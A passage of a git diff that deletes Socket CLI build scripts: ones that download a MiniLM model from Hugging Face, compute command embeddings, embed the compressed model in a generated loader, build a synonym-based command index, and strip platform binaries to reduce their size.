tokens.push('[UNK]') - } - } - - tokens.push('[SEP]') - - return { - input_ids: tokens.map(t => this.vocab[t] ?? this.vocab['[UNK]']), - attention_mask: tokens.map(() => 1), - } - } -} - -/** - * Mean pooling over token embeddings. - */ -function meanPooling(embeddings, attentionMask) { - const seqLen = embeddings.length - const hiddenSize = embeddings[0].length - - const pooled = new Array(hiddenSize).fill(0) - let totalMask = 0 - - for (let i = 0; i < seqLen; i++) { - const mask = attentionMask[i] - totalMask += mask - - for (let j = 0; j < hiddenSize; j++) { - pooled[j] += embeddings[i][j] * mask - } - } - - // Average. - for (let j = 0; j < hiddenSize; j++) { - pooled[j] /= totalMask - } - - return pooled -} - -/** - * Normalize vector to unit length. - */ -function normalize(vector) { - const norm = Math.sqrt(vector.reduce((sum, v) => sum + v * v, 0)) - return vector.map(v => v / norm) -} - -/** - * Get embedding for text using ONNX Runtime. - */ -async function getEmbedding(session, tokenizer, text) { - // Tokenize. - const { attention_mask, input_ids } = tokenizer.encode(text) - - // Create tensors. - const inputIdsTensor = new ort.Tensor( - 'int64', - BigInt64Array.from(input_ids.map(BigInt)), - [1, input_ids.length], - ) - const attentionMaskTensor = new ort.Tensor( - 'int64', - BigInt64Array.from(attention_mask.map(BigInt)), - [1, attention_mask.length], - ) - - // Run inference. - const outputs = await session.run({ - input_ids: inputIdsTensor, - attention_mask: attentionMaskTensor, - }) - - // Get embeddings (last_hidden_state). - const embeddings = outputs.last_hidden_state.data - const seqLen = input_ids.length - const hiddenSize = embeddings.length / seqLen - - // Reshape to [seqLen, hiddenSize]. - const embeddingsArray = [] - for (let i = 0; i < seqLen; i++) { - embeddingsArray.push( - Array.from(embeddings.slice(i * hiddenSize, (i + 1) * hiddenSize)), - ) - } - - // Mean pooling. - const pooled = meanPooling(embeddingsArray, attention_mask) - - // Normalize. - return normalize(pooled) -} - -// Main execution. -await downloadModel() -await downloadTokenizer() - -logger.log('📝 Loading model...') -const session = await ort.InferenceSession.create(modelPath) - -logger.log('📝 Loading tokenizer...') -const tokenizerData = JSON.parse(readFileSync(tokenizerPath, 'utf-8')) -const tokenizer = new SimpleTokenizer(tokenizerData.model.vocab) - -logger.log('📝 Loading commands...') -const commandsPath = path.join(skillDir, 'commands.json') -const commands = JSON.parse(readFileSync(commandsPath, 'utf-8')) - -// Compute embeddings. -const embeddings = { - commands: {}, - examples: {}, - meta: { - model: 'Xenova/paraphrase-MiniLM-L3-v2', - dimension: 384, - generatedAt: new Date().toISOString(), - method: 'pure-onnx', - }, -} - -logger.log('🔢 Computing command embeddings...') -for (const [commandName, commandData] of Object.entries(commands.commands)) { - logger.log(` → ${commandName}`) - - const embedding = await getEmbedding( - session, - tokenizer, - commandData.description, - ) - - embeddings.commands[commandName] = { - description: commandData.description, - embedding, - keywords: commandData.keywords, - examples: commandData.examples, - } -} - -logger.log('🔢 Computing example embeddings...') -for (const [commandName, commandData] of Object.entries(commands.commands)) { - for (const example of commandData.examples) { - const embedding = await getEmbedding(session, tokenizer, example) - embeddings.examples[example] = { - command: commandName, - embedding, - } - } -} - -// Save embeddings. -const outputPath = path.join(skillDir, 'embeddings.json') -writeFileSync(outputPath, JSON.stringify(embeddings, null, 2), 'utf-8') - -logger.log('') -logger.success(`Generated ${outputPath}`) -logger.success(`Embedded ${Object.keys(embeddings.commands).length} commands`) -logger.success( - `Embedded ${Object.keys(embeddings.examples).length} example queries`, -) -logger.log( - `✓ File size: ${(JSON.stringify(embeddings).length / 1024).toFixed(2)} KB`, -) diff --git a/scripts/llm/download-minilm.mjs b/scripts/llm/download-minilm.mjs deleted file mode 100644 index e5b73b659..000000000 --- a/scripts/llm/download-minilm.mjs +++ /dev/null @@ -1,133 +0,0 @@ -/** - * Download MiniLM Model Assets - * - * Downloads paraphrase-MiniLM-L3-v2 vocabulary and model from Hugging Face. - * - * WHAT IT DOWNLOADS: - * 1. tokenizer.json - WordPiece vocabulary (~500KB) - * 2. model_quantized.onnx - Quantized model weights (~17MB) - * - * WHY QUANTIZED: - * - 8-bit quantization reduces size by ~4x (68MB → 17MB) - * - Minimal accuracy loss (<1%) - * - Faster inference on CPU - * - * MODEL INFO: - * - Name: sentence-transformers/paraphrase-MiniLM-L3-v2 - * - Type: Sentence transformer for semantic similarity - * - Layers: 3 (L3 = lightweight) - * - Embedding dim: 384 - * - Vocab size: 30,522 tokens - * - * OUTPUT: - * - .cache/models/tokenizer.json - * - .cache/models/model_quantized.onnx - */ - -import { promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const cacheDir = path.join(rootPath, '.cache/models') - -// Hugging Face model repository. -const MODEL_REPO = 'Xenova/paraphrase-MiniLM-L3-v2' -const BASE_URL = `https://huggingface.co/${MODEL_REPO}/resolve/main` - -// Files to download. -const FILES = [ - { - name: 'tokenizer.json', - url: `${BASE_URL}/tokenizer.json`, - description: 'WordPiece vocabulary', - }, - { - name: 'model_quantized.onnx', - url: `${BASE_URL}/onnx/model_quantized.onnx`, - description: 'Quantized ONNX model', - }, -] - -/** - * Download file with progress. - */ -async function downloadFile(url, outputPath, description) { - logger.log(`📦 Downloading ${description}...`) - logger.log(` URL: ${url}`) - - const response = await fetch(url) - - if (!response.ok) { - throw new Error(`Failed to download ${url}: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - - await fs.writeFile(outputPath, Buffer.from(buffer)) - - const sizeMB = (buffer.byteLength / 1024 / 1024).toFixed(2) - logger.substep(`Downloaded ${sizeMB} MB`) - logger.substep(`Saved to ${outputPath}`) - logger.log('') - - return buffer.byteLength -} - -/** - * Main download logic. - */ -async function main() { - logger.log('╔═══════════════════════════════════════════════════╗') - logger.log('║ Download MiniLM Model for Socket CLI ║') - logger.log('╚═══════════════════════════════════════════════════╝\n') - - // Create cache directory. - await fs.mkdir(cacheDir, { recursive: true }) - logger.success(`Cache directory: ${cacheDir}`) - logger.log('') - - let totalBytes = 0 - - // Download each file. - for (const file of FILES) { - const outputPath = path.join(cacheDir, file.name) - - // Check if file already exists. - try { - await fs.access(outputPath) - const stats = await fs.stat(outputPath) - logger.log( - `✓ ${file.description} already exists (${(stats.size / 1024 / 1024).toFixed(2)} MB)`, - ) - logger.log(` ${outputPath}\n`) - totalBytes += stats.size - continue - } catch { - // File doesn't exist - download it. - } - - const bytes = await downloadFile(file.url, outputPath, file.description) - totalBytes += bytes - } - - logger.log('╔═══════════════════════════════════════════════════╗') - logger.log('║ Download Complete ║') - logger.log('╚═══════════════════════════════════════════════════╝\n') - logger.log(`Total size: ${(totalBytes / 1024 / 1024).toFixed(2)} MB`) - logger.log('\nNext steps:') - logger.log(' 1. Run: node scripts/llm/embed-minilm.mjs') - logger.log( - ' 2. This will create external/minilm-sync.mjs with embedded model', - ) -} - -main().catch(error => { - logger.error(`${colors.red('✗')} Download failed:`, error.message) - process.exit(1) -}) diff --git a/scripts/llm/embed-minilm.mjs b/scripts/llm/embed-minilm.mjs deleted file mode 100644 index bbd2f6c2f..000000000 --- a/scripts/llm/embed-minilm.mjs +++ /dev/null @@ -1,197 +0,0 @@ -/** - * Embed MiniLM Model as Synchronous Loader - * - * Strategy: - * 1. Read model and vocabulary files - * 2. Compress with brotli (best compression) - * 3. Base64 encode compressed data - * 4. Generate external/minilm-sync.mjs with embedded data - * 5. Runtime: decode base64 → decompress brotli → use - * - * WHY BROTLI+BASE64: - * - Brotli: ~40-60% compression on binary data - * - Base64: Safe for Rollup parser (no special chars) - * - Much smaller than plain base64 (23MB → ~8-10MB) - * - Compatible with SEA (Single Executable Application) - * - * OUTPUT: - * external/minilm-sync.mjs containing: - * - Brotli+base64 tokenizer vocabulary - * - Brotli+base64 ONNX model weights - * - Synchronous decompression utilities - */ - -import { readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const cacheDir = path.join(rootPath, '.cache/models') - -logger.log('╔═══════════════════════════════════════════════════╗') -logger.log('║ Embed MiniLM Model for Socket CLI ║') -logger.log('╚═══════════════════════════════════════════════════╝\n') - -// Read tokenizer vocabulary. -logger.log('📖 Reading tokenizer.json...') -const tokenizerPath = path.join(cacheDir, 'tokenizer.json') -const tokenizerData = readFileSync(tokenizerPath) -const tokenizerCompressed = brotliCompressSync(tokenizerData) -const tokenizerBase64 = tokenizerCompressed.toString('base64') -logger.log(` ✓ Read ${tokenizerData.length} bytes`) -logger.log( - ` ✓ Brotli compressed: ${tokenizerCompressed.length} bytes (${((tokenizerCompressed.length / tokenizerData.length) * 100).toFixed(1)}%)`, -) -logger.log(` ✓ Base64 encoded: ${tokenizerBase64.length} bytes\n`) - -// Read ONNX model. -logger.log('📖 Reading model_quantized.onnx...') -const modelPath = path.join(cacheDir, 'model_quantized.onnx') -const modelData = readFileSync(modelPath) -const modelCompressed = brotliCompressSync(modelData) -const modelBase64 = modelCompressed.toString('base64') -logger.log(` ✓ Read ${modelData.length} bytes`) -logger.log( - ` ✓ Brotli compressed: ${modelCompressed.length} bytes (${((modelCompressed.length / modelData.length) * 100).toFixed(1)}%)`, -) -logger.log(` ✓ Base64 encoded: ${modelBase64.length} bytes\n`) - -// Generate minilm-sync.mjs. -logger.log('📝 Generating external/minilm-sync.mjs...') - -const syncContent = `/** - * Synchronous MiniLM Model Loader - * - * This file is AUTO-GENERATED by scripts/llm/embed-minilm.mjs - * DO NOT EDIT MANUALLY - changes will be overwritten on next build. - * - * Contains: - * - Brotli-compressed, base64-encoded tokenizer vocabulary - * - Brotli-compressed, base64-encoded ONNX model - * - Synchronous decompression utilities - * - * Original sizes: - * - Tokenizer: ${(tokenizerData.length / 1024).toFixed(2)} KB → ${(tokenizerBase64.length / 1024).toFixed(2)} KB (${((tokenizerCompressed.length / tokenizerData.length) * 100).toFixed(1)}% compressed) - * - Model: ${(modelData.length / 1024 / 1024).toFixed(2)} MB → ${(modelBase64.length / 1024 / 1024).toFixed(2)} MB (${((modelCompressed.length / modelData.length) * 100).toFixed(1)}% compressed) - * - * Total embedded size: ${((tokenizerBase64.length + modelBase64.length) / 1024 / 1024).toFixed(2)} MB - */ - -import { brotliDecompressSync } from 'node:zlib' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -/** - * Embedded tokenizer vocabulary (brotli-compressed, base64-encoded). - */ -const TOKENIZER_BASE64 = '${tokenizerBase64}' - -/** - * Embedded ONNX model (brotli-compressed, base64-encoded). - */ -const MODEL_BASE64 = '${modelBase64}' - -/** - * Load tokenizer vocabulary synchronously. - * - * @returns Parsed tokenizer configuration - */ -export function loadTokenizerSync() { - // Decode base64 to Buffer. - const compressed = Buffer.from(TOKENIZER_BASE64, 'base64') - - // Decompress with brotli. - const decompressed = brotliDecompressSync(compressed) - - // Parse JSON. - const text = decompressed.toString('utf-8') - return JSON.parse(text) -} - -/** - * Load ONNX model synchronously. - * - * @returns ONNX model as Uint8Array - */ -export function loadModelSync() { - // Decode base64 to Buffer. - const compressed = Buffer.from(MODEL_BASE64, 'base64') - - // Decompress with brotli. - const decompressed = brotliDecompressSync(compressed) - - // Return as Uint8Array for ONNX Runtime. - return new Uint8Array(decompressed.buffer, decompressed.byteOffset, decompressed.byteLength) -} - -/** - * Get embedded asset sizes. - * - * @returns Size information - */ -export function getEmbeddedSizes() { - return { - tokenizer: { - compressed: ${tokenizerCompressed.length}, - base64: TOKENIZER_BASE64.length, - original: ${tokenizerData.length}, - }, - model: { - compressed: ${modelCompressed.length}, - base64: MODEL_BASE64.length, - original: ${modelData.length}, - }, - total: { - compressed: ${tokenizerCompressed.length + modelCompressed.length}, - base64: TOKENIZER_BASE64.length + MODEL_BASE64.length, - original: ${tokenizerData.length + modelData.length}, - }, - } -} -` - -const outputPath = path.join(rootPath, 'external/minilm-sync.mjs') -writeFileSync(outputPath, syncContent, 'utf-8') - -logger.log(` ✓ Generated ${outputPath}`) -logger.log( - ` ✓ File size: ${(syncContent.length / 1024 / 1024).toFixed(2)} MB\n`, -) - -logger.log('╔═══════════════════════════════════════════════════╗') -logger.log('║ Embedding Complete ║') -logger.log('╚═══════════════════════════════════════════════════╝\n') - -const originalSizeMB = ( - (tokenizerData.length + modelData.length) / - 1024 / - 1024 -).toFixed(2) -const compressedSizeMB = ( - (tokenizerCompressed.length + modelCompressed.length) / - 1024 / - 1024 -).toFixed(2) -const base64SizeMB = ( - (tokenizerBase64.length + modelBase64.length) / - 1024 / - 1024 -).toFixed(2) - -logger.log('📊 Compression Results:') -logger.log(` Original: ${originalSizeMB} MB`) -logger.log( - ` Compressed: ${compressedSizeMB} MB (${(((tokenizerCompressed.length + modelCompressed.length) / (tokenizerData.length + modelData.length)) * 100).toFixed(1)}%)`, -) -logger.log(` Base64: ${base64SizeMB} MB`) -logger.log('') -logger.log( - ` Total savings: ${(originalSizeMB - base64SizeMB).toFixed(2)} MB (${(100 - (base64SizeMB / originalSizeMB) * 100).toFixed(1)}% reduction)`, -) -logger.log('\nNext steps:') -logger.log(' 1. Run build: pnpm run build') -logger.log(' 2. Test LLM features in src/commands/ask/handle-ask.mts') diff --git a/scripts/llm/generate-semantic-index.mjs b/scripts/llm/generate-semantic-index.mjs deleted file mode 100644 index 11426d192..000000000 --- a/scripts/llm/generate-semantic-index.mjs +++ /dev/null @@ -1,205 +0,0 @@ -/** - * Generate semantic similarity index WITHOUT any ML models. - * - * WHAT THIS DOES: - * - Creates a searchable index of Socket CLI commands using simple word matching - * - NO machine learning, NO embeddings, NO 12MB models - * - Just smart word matching with synonym expansion - * - * HOW IT WORKS: - * 1. Reads Socket CLI command definitions from commands.json - * 2. Expands keywords using synonym dictionary (e.g., "fix" = "repair", "resolve") - * 3. Extracts all meaningful words from descriptions, keywords, examples - * 4. Creates a lightweight index for fast word overlap matching - * - * BENEFITS: - * - Tiny footprint (~few KB vs 12MB model) - * - Zero runtime cost (pre-computed at build time) - * - Works offline, no network needed - * - Pure JavaScript, runs anywhere - * - * USAGE: - * At runtime, `socket ask` can match user queries against this index using - * simple word overlap + synonym matching. Example: - * Query: "repair vulnerabilities" → matches "fix" (synonym expansion) - * Query: "check my deps" → matches "scan" (deps = dependencies = package) - */ - -import { readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -// Get the directory of this script file. -const __dirname = path.dirname(fileURLToPath(import.meta.url)) - -// Navigate to user's home directory for .claude/skills. -const homeDir = process.env.HOME || process.env.USERPROFILE -const skillDir = path.join(homeDir, '.claude/skills/socket-cli') - -logger.log('🔤 Generating semantic index (no ML models)...') - -// Load commands. -const commandsPath = path.join(skillDir, 'commands.json') -const commands = JSON.parse(readFileSync(commandsPath, 'utf-8')) - -/** - * Synonym mappings for semantic understanding. - * - * WHAT THIS IS: - * A manually-curated dictionary that maps related words to canonical forms. - * This enables semantic matching without ML models. - * - * EXAMPLE: - * When user says "repair vulnerabilities", we map: - * - "repair" → "fix" (canonical form) - * - Query matches "socket fix" command - * - * WHY THIS WORKS: - * Most natural language queries use synonyms of the same core concepts. - * By expanding synonyms, we achieve ~80-90% of ML semantic matching - * with ZERO runtime cost and ZERO model size. - */ -const SYNONYMS = { - fix: [ - 'repair', - 'resolve', - 'remediate', - 'correct', - 'address', - 'mend', - 'heal', - 'cure', - ], - patch: ['hotfix', 'bandaid', 'workaround', 'apply'], - optimize: [ - 'enhance', - 'improve', - 'upgrade', - 'better', - 'faster', - 'streamline', - 'refine', - ], - scan: [ - 'check', - 'inspect', - 'examine', - 'audit', - 'review', - 'analyze', - 'investigate', - ], - vulnerability: [ - 'vuln', - 'issue', - 'problem', - 'flaw', - 'weakness', - 'bug', - 'security issue', - 'cve', - ], - package: ['dependency', 'module', 'library', 'dep', 'pkg'], - safe: ['secure', 'trusted', 'reliable', 'trustworthy', 'clean'], - score: ['rating', 'grade', 'quality', 'safety'], - replace: ['swap', 'substitute', 'change', 'switch'], - update: ['upgrade', 'refresh', 'renew'], - remove: ['delete', 'eliminate', 'eradicate'], - find: ['locate', 'discover', 'detect', 'identify'], -} - -/** - * Create reverse mapping: synonym → canonical form. - * - * EXAMPLE: - * SYNONYMS: { fix: ['repair', 'resolve'] } - * CANONICAL: { fix: 'fix', repair: 'fix', resolve: 'fix' } - * - * This allows O(1) lookup to normalize any word to its canonical form. - */ -const CANONICAL = {} -for (const [canonical, synonyms] of Object.entries(SYNONYMS)) { - // Map canonical word to itself. - CANONICAL[canonical] = canonical - - // Map each synonym to the canonical form. - for (const synonym of synonyms) { - CANONICAL[synonym] = canonical - } -} - -/** - * Normalize word to canonical form. - */ -function canonicalize(word) { - return CANONICAL[word.toLowerCase()] || word.toLowerCase() -} - -/** - * Extract meaningful words from text. - */ -function extractWords(text) { - // Remove punctuation and split. - const words = text - .toLowerCase() - .replace(/[^\w\s-]/g, '') - .split(/\s+/) - .filter(w => w.length > 2) // Filter short words. - - // Canonicalize. - return words.map(canonicalize) -} - -// Build semantic index. -const semanticIndex = { - commands: {}, - meta: { - method: 'word-overlap + synonyms', - generatedAt: new Date().toISOString(), - }, -} - -logger.log('📊 Building semantic index...') - -for (const [commandName, commandData] of Object.entries(commands.commands)) { - logger.log(` → ${commandName}`) - - // Extract all relevant words for this command. - const commandWords = new Set() - - // From description. - extractWords(commandData.description).forEach(w => commandWords.add(w)) - - // From keywords. - commandData.keywords.forEach(kw => { - extractWords(kw).forEach(w => commandWords.add(w)) - }) - - // From examples. - commandData.examples.forEach(ex => { - extractWords(ex).forEach(w => commandWords.add(w)) - }) - - semanticIndex.commands[commandName] = { - description: commandData.description, - words: Array.from(commandWords).sort(), - keywords: commandData.keywords, - examples: commandData.examples, - } -} - -// Save semantic index. -const outputPath = path.join(skillDir, 'semantic-index.json') -writeFileSync(outputPath, JSON.stringify(semanticIndex, null, 2), 'utf-8') - -logger.log('') -logger.success(`Generated ${outputPath}`) -logger.success(`Indexed ${Object.keys(semanticIndex.commands).length} commands`) -logger.success( - `File size: ${(JSON.stringify(semanticIndex).length / 1024).toFixed(2)} KB`, -) -logger.success('Zero runtime overhead - pure JavaScript!') diff --git a/scripts/llm/generate-skill-embeddings.mjs b/scripts/llm/generate-skill-embeddings.mjs deleted file mode 100644 index e81ad8c12..000000000 --- a/scripts/llm/generate-skill-embeddings.mjs +++ /dev/null @@ -1,93 +0,0 @@ -/** - * Pre-compute semantic embeddings for Socket CLI commands. - * This runs at build time to generate embeddings that can be used - * for semantic matching without requiring a runtime model. - */ - -import { readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { pipeline } from '@xenova/transformers' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const skillDir = path.join( - path.dirname(__dirname), - '../.claude/skills/socket-cli', -) - -logger.log('🧠 Computing semantic embeddings for Socket CLI commands...') - -// Load commands. -const commandsPath = path.join(skillDir, 'commands.json') -const commands = JSON.parse(readFileSync(commandsPath, 'utf-8')) - -// Initialize embedding pipeline. -logger.log('📦 Loading paraphrase-MiniLM-L3-v2 model...') -const embedder = await pipeline( - 'feature-extraction', - 'Xenova/paraphrase-MiniLM-L3-v2', -) - -/** - * Get embedding for a text string. - */ -async function getEmbedding(text) { - const result = await embedder(text, { pooling: 'mean', normalize: true }) - return Array.from(result.data) -} - -// Compute embeddings for each command. -const embeddings = { - commands: {}, - meta: { - model: 'Xenova/paraphrase-MiniLM-L3-v2', - dimension: 384, - generatedAt: new Date().toISOString(), - }, -} - -for (const [commandName, commandData] of Object.entries(commands.commands)) { - logger.log(` → Computing embedding for: ${commandName}`) - - // Embed the description (most semantic meaning). - const embedding = await getEmbedding(commandData.description) - - embeddings.commands[commandName] = { - description: commandData.description, - embedding, - keywords: commandData.keywords, - examples: commandData.examples, - } -} - -// Also compute embeddings for all example queries. -logger.log('📝 Computing embeddings for example queries...') -embeddings.examples = {} - -for (const [commandName, commandData] of Object.entries(commands.commands)) { - for (const example of commandData.examples) { - const embedding = await getEmbedding(example) - embeddings.examples[example] = { - command: commandName, - embedding, - } - } -} - -// Save embeddings. -const outputPath = path.join(skillDir, 'embeddings.json') -writeFileSync(outputPath, JSON.stringify(embeddings, null, 2), 'utf-8') - -logger.log(`✓ Generated ${outputPath}`) -logger.log(`✓ Embedded ${Object.keys(embeddings.commands).length} commands`) -logger.log( - `✓ Embedded ${Object.keys(embeddings.examples).length} example queries`, -) -logger.log( - `✓ File size: ${(JSON.stringify(embeddings).length / 1024).toFixed(2)} KB`, -) diff --git a/scripts/optimize-binary-size.mjs b/scripts/optimize-binary-size.mjs deleted file mode 100755 index 03f105a20..000000000 --- a/scripts/optimize-binary-size.mjs +++ /dev/null @@ -1,356 +0,0 @@ -#!/usr/bin/env node -/** - * Binary Size Optimization Script - * - * Applies platform-specific optimizations to reduce Socket CLI binary sizes: - * - macOS (darwin): strip, llvm-strip, code signing - * - Linux: strip --strip-all, objcopy section removal - * - Windows: strip --strip-all - * - * Target: Reduce from ~49MB to ~18-28MB per binary - * - * Usage: - * node scripts/optimize-binary-size.mjs [--platform=] - * node scripts/optimize-binary-size.mjs --all - */ - -import { execSync, spawn } from 'node:child_process' -import { existsSync, promises as fs } from 'node:fs' -import { platform as osPlatform } from 'node:os' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootDir = path.join(__dirname, '..') - -// Parse command line arguments. -const args = process.argv.slice(2) -let binaryPath = null -let targetPlatform = null -let optimizeAll = false - -for (let i = 0; i < args.length; i++) { - const arg = args[i] - if (arg === '--all') { - optimizeAll = true - } else if (arg.startsWith('--platform=')) { - targetPlatform = arg.slice(11) - } else if (!arg.startsWith('--')) { - binaryPath = arg - } -} - -/** - * Get file size in MB. - */ -async function getFileSizeMB(filePath) { - const stats = await fs.stat(filePath) - return (stats.size / (1024 * 1024)).toFixed(2) -} - -/** - * Check if a command exists. - */ -function commandExists(cmd) { - try { - execSync(`which ${cmd}`, { stdio: 'ignore' }) - return true - } catch { - return false - } -} - -/** - * Execute a command with error handling. - */ -function exec(command, args, options = {}) { - logger.log(` $ ${command} ${args.join(' ')}`) - try { - execSync(`${command} ${args.join(' ')}`, { - stdio: 'inherit', - ...options, - }) - return true - } catch (e) { - logger.error(` ✗ Command failed: ${e.message}`) - return false - } -} - -/** - * Optimize binary for macOS (darwin). - */ -async function optimizeDarwin(binaryPath) { - logger.log('\n🍎 Optimizing macOS binary...') - - const beforeSize = await getFileSizeMB(binaryPath) - logger.log(` Before: ${beforeSize} MB`) - - // Phase 1: Basic stripping. - if (commandExists('strip')) { - logger.log('\n Phase 1: Basic stripping') - exec('strip', [binaryPath]) - } - - // Phase 2: Aggressive stripping with llvm-strip (often better than strip on macOS). - if (commandExists('llvm-strip')) { - logger.log('\n Phase 2: LLVM aggressive stripping') - exec('llvm-strip', [binaryPath]) - } else { - logger.log('\n Phase 2: Aggressive stripping (strip --strip-all)') - exec('strip', ['--strip-all', binaryPath]) - } - - // Phase 3: Remove unnecessary Mach-O sections. - logger.log('\n Phase 3: Remove unnecessary sections') - // Note: Most Mach-O section removal requires specialized tools. - // strip and llvm-strip already handle this well. - - const afterSize = await getFileSizeMB(binaryPath) - const savings = ((beforeSize - afterSize) / beforeSize * 100).toFixed(1) - logger.log(`\n After: ${afterSize} MB (${savings}% reduction)`) - - // Re-sign binary if on macOS ARM64 (required). - if (osPlatform() === 'darwin' && process.arch === 'arm64') { - logger.log('\n Phase 4: Code signing') - exec('codesign', ['--force', '--sign', '-', binaryPath]) - } - - return { before: parseFloat(beforeSize), after: parseFloat(afterSize), savings: parseFloat(savings) } -} - -/** - * Optimize binary for Linux. - */ -async function optimizeLinux(binaryPath) { - logger.log('\n🐧 Optimizing Linux binary...') - - const beforeSize = await getFileSizeMB(binaryPath) - logger.log(` Before: ${beforeSize} MB`) - - // Phase 1: Aggressive stripping. - logger.log('\n Phase 1: Aggressive stripping') - exec('strip', ['--strip-all', binaryPath]) - - // Phase 2: Remove unnecessary ELF sections. - if (commandExists('objcopy')) { - logger.log('\n Phase 2: Remove unnecessary ELF sections') - const sections = [ - '.note.ABI-tag', - '.note.gnu.build-id', - '.comment', - '.gnu.version', - ] - - for (const section of sections) { - exec('objcopy', [`--remove-section=${section}`, binaryPath]) - } - } - - // Phase 3: Super strip (sstrip) if available. - if (commandExists('sstrip')) { - logger.log('\n Phase 3: Super strip (removes section headers)') - exec('sstrip', [binaryPath]) - } - - const afterSize = await getFileSizeMB(binaryPath) - const savings = ((beforeSize - afterSize) / beforeSize * 100).toFixed(1) - logger.log(`\n After: ${afterSize} MB (${savings}% reduction)`) - - return { before: parseFloat(beforeSize), after: parseFloat(afterSize), savings: parseFloat(savings) } -} - -/** - * Optimize binary for Windows. - */ -async function optimizeWindows(binaryPath) { - logger.log('\n🪟 Optimizing Windows binary...') - - const beforeSize = await getFileSizeMB(binaryPath) - logger.log(` Before: ${beforeSize} MB`) - - // Phase 1: Aggressive stripping. - // Note: Windows binaries are typically cross-compiled on Linux/macOS with mingw. - logger.log('\n Phase 1: Aggressive stripping') - - // Try mingw-strip for Windows binaries. - if (commandExists('x86_64-w64-mingw32-strip')) { - exec('x86_64-w64-mingw32-strip', ['--strip-all', binaryPath]) - } else if (commandExists('strip')) { - exec('strip', ['--strip-all', binaryPath]) - } - - const afterSize = await getFileSizeMB(binaryPath) - const savings = ((beforeSize - afterSize) / beforeSize * 100).toFixed(1) - logger.log(`\n After: ${afterSize} MB (${savings}% reduction)`) - - return { before: parseFloat(beforeSize), after: parseFloat(afterSize), savings: parseFloat(savings) } -} - -/** - * Optimize a single binary. - */ -async function optimizeBinary(binaryPath, platform) { - // Detect platform from binary path if not specified. - if (!platform) { - if (binaryPath.includes('darwin')) { - platform = 'darwin' - } else if (binaryPath.includes('linux') || binaryPath.includes('alpine')) { - platform = 'linux' - } else if (binaryPath.includes('win32') || binaryPath.endsWith('.exe')) { - platform = 'win32' - } else { - platform = osPlatform() - } - } - - logger.log(`\n📦 Optimizing: ${path.basename(binaryPath)}`) - logger.log(` Platform: ${platform}`) - - // Check binary exists. - if (!existsSync(binaryPath)) { - logger.error(`\n${colors.red('✗')} Binary not found: ${binaryPath}`) - return null - } - - // Apply platform-specific optimizations. - let result - switch (platform) { - case 'darwin': - result = await optimizeDarwin(binaryPath) - break - case 'linux': - case 'alpine': - result = await optimizeLinux(binaryPath) - break - case 'win32': - result = await optimizeWindows(binaryPath) - break - default: - logger.error(`\n${colors.red('✗')} Unsupported platform: ${platform}`) - return null - } - - logger.log(`\n${colors.green('✓')} Optimization complete!`) - return result -} - -/** - * Find and optimize all platform binaries. - */ -async function optimizeAllBinaries() { - logger.log('🔍 Finding all platform binaries...\n') - - const packagesDir = path.join(rootDir, 'packages') - const binaryPatterns = [ - 'socketbin-cli-*/bin/socket', - 'socketbin-cli-*/bin/socket.exe', - ] - - const binaries = [] - for (const pattern of binaryPatterns) { - const [dir, file] = pattern.split('/') - const packages = await fs.readdir(packagesDir) - - for (const pkg of packages) { - if (pkg.startsWith('socketbin-cli-')) { - const binPath = path.join(packagesDir, pkg, 'bin', file.replace('*', '')) - if (existsSync(binPath)) { - const stats = await fs.stat(binPath) - // Only process actual binaries (>1MB), not placeholders. - if (stats.size > 1024 * 1024) { - binaries.push(binPath) - } - } - } - } - } - - if (binaries.length === 0) { - logger.log(`${colors.yellow('⚠')} No binaries found to optimize`) - logger.log(' Run build first: pnpm run build:platforms') - return [] - } - - logger.log(`Found ${binaries.length} binaries to optimize:\n`) - binaries.forEach(b => logger.log(` - ${path.relative(rootDir, b)}`)) - - const results = [] - for (const binaryPath of binaries) { - const result = await optimizeBinary(binaryPath, null) - if (result) { - results.push({ path: binaryPath, ...result }) - } - } - - return results -} - -/** - * Main entry point. - */ -async function main() { - logger.log('⚡ Socket CLI Binary Size Optimizer') - logger.log('=' .repeat(50)) - - let results = [] - - if (optimizeAll) { - results = await optimizeAllBinaries() - } else if (binaryPath) { - const result = await optimizeBinary(binaryPath, targetPlatform) - if (result) { - results.push({ path: binaryPath, ...result }) - } - } else { - logger.error(`\n${colors.red('✗')} Error: No binary specified`) - logger.log('\nUsage:') - logger.log(' node scripts/optimize-binary-size.mjs [--platform=]') - logger.log(' node scripts/optimize-binary-size.mjs --all') - logger.log('\nExamples:') - logger.log(' node scripts/optimize-binary-size.mjs packages/socketbin-cli-darwin-arm64/bin/socket') - logger.log(' node scripts/optimize-binary-size.mjs build/out/Release/node --platform=linux') - logger.log(' node scripts/optimize-binary-size.mjs --all') - process.exit(1) - } - - // Summary. - if (results.length > 0) { - logger.log('\n' + '='.repeat(50)) - logger.log('📊 Optimization Summary') - logger.log('='.repeat(50)) - logger.log('') - - let totalBefore = 0 - let totalAfter = 0 - - for (const { path: binPath, before, after, savings } of results) { - totalBefore += before - totalAfter += after - logger.log(` ${path.basename(binPath)}:`) - logger.log(` Before: ${before.toFixed(2)} MB`) - logger.log(` After: ${after.toFixed(2)} MB`) - logger.log(` Saved: ${(before - after).toFixed(2)} MB (${savings.toFixed(1)}%)`) - 